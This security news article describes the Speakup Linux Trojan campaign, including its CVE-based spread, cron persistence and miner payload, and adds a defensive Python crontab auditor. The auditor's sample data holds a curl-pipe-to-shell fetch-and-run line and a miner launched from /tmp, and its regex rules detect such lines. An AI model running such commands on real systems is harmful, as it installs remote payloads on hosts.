New Trojan Horse Malware Campaign Targeting Linux Servers Identified

Security researchers have discovered a new Trojan horse malware campaign used by hackers to launch attacks on Linux servers.

Trojan horses are malware variants that are disguised as benign or useful pieces of software. They are installed under false pretences, as the user is often tricked into believing that they serve a legitimate purpose. Once the Trojan is executed on a server, the hacker can gain access to the system and steal valuable information for nefarious purposes. The Trojans are often installed through a phishing campaign.

The new Trojan campaign was discovered by security researchers at Check Point, an IT security company. The Trojan, named Speakup, is currently being used to launch attacks on Linux servers, but the researchers have identified that it could potentially be used on Mac devices too.

The Trojan is deployed via exploits of vulnerabilities across six Linux distributions, including the recently identified ThinkPHP vulnerability, CVE-2018-20062.

The current campaign is targeting Linux devices in China, India, the Philippines, and Latin America. The Trojan was first detected in late December, but infections have increased considerably since January 22, 2019. Several AV engines are now recognising the malware, but, at the time of analysis, the malware was not being detected as malicious.

Once installed, the malware communicates with its C2 server and registers the victim’s machine. The malware attempts to spread laterally within the infected subnet via a range of RCE vulnerabilities including CVE-2012-0874, CVE-2010-1871, CVE-2017-10271, CVE-2018-2894, CVE-2016-3088, the Hadoop YARN ResourceManager command execution flaw, and a JBoss AS 3/4/5/6 RCE vulnerability.

A Python script is included which scans for further Linux servers within both internal and external subnets. Access is gained through brute force means using a pre-defined list of usernames/passwords. Persistence is achieved via cron and an internal mutex which ensures only one instance remains alive at any one time.

The Speakup Linux backdoor Trojan continuously communicates with its C2 and downloads and runs a range of different files, including an XMRig miner. The Trojan, under its C2 control, can run arbitrary code, download and execute files, stop running processes on an infected host, uninstall programs, and update installed files.
Check Point researchers have attributed the Speakup Linux backdoor Trojan to a threat actor known as Zettabithf.
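
The cron persistence and XMRig download behaviour described above can be checked for on a host by auditing crontab entries. The following is an added example, not code from Check Point or from the malware: the three rules are generic heuristics assumed here rather than Speakup indicators from the report, and the sample crontab is constructed.

```python
import re

# Heuristics chosen for this example; they are not Speakup indicators from the report.
RULES = {
    "fetch-and-run": re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash|python\d?|perl)\b"),
    "runs-from-temp-dir": re.compile(r"(^|[\s;&|])(/tmp|/var/tmp|/dev/shm)/\S+"),
    "miner-name": re.compile(r"xmrig", re.IGNORECASE),
}
ENV_LINE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*\s*=")

def cron_command(line):
    """Return the command part of a crontab line, or None if it has none."""
    line = line.strip()
    if not line or line.startswith("#") or ENV_LINE.match(line):
        return None
    if line.startswith("@"):            # @reboot, @hourly, ...
        parts = line.split(None, 1)
        return parts[1] if len(parts) == 2 else None
    parts = line.split(None, 5)         # five schedule fields, then the command
    return parts[5] if len(parts) == 6 else None

def audit_crontab(text):
    """Return [(line_number, [rule names])] for entries matching any rule."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        cmd = cron_command(line)
        if cmd is None:
            continue
        hits = [name for name, rx in RULES.items() if rx.search(cmd)]
        if hits:
            findings.append((n, hits))
    return findings

# Constructed sample crontab (not taken from an infected host).
SAMPLE = """\
# m h dom mon dow command
MAILTO=root
0 3 * * * /usr/local/bin/backup.sh
*/5 * * * * curl -fsSL http://203.0.113.10/u | sh
@reboot /tmp/.cache/xmrig -c /tmp/.cache/c.json
15 4 * * 0 /usr/bin/certbot renew --quiet
"""

if __name__ == "__main__":
    for n, hits in audit_crontab(SAMPLE):
        print(f"line {n}: {', '.join(hits)}")
```

To audit a live host, pass the output of `crontab -l` for each user and the contents of `/etc/crontab` and `/etc/cron.d/*` to `audit_crontab`; a match is a lead for review, not proof of infection.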

The complex nature of the malware suggests it is likely that the goal of the attacker is not only to deploy cryptocurrency miners. Once infected, any number of different malware payloads can be deployed. Researchers at Check Point warn that the threat actor may launch a more aggressive campaign in the future.

Author: Defensorum
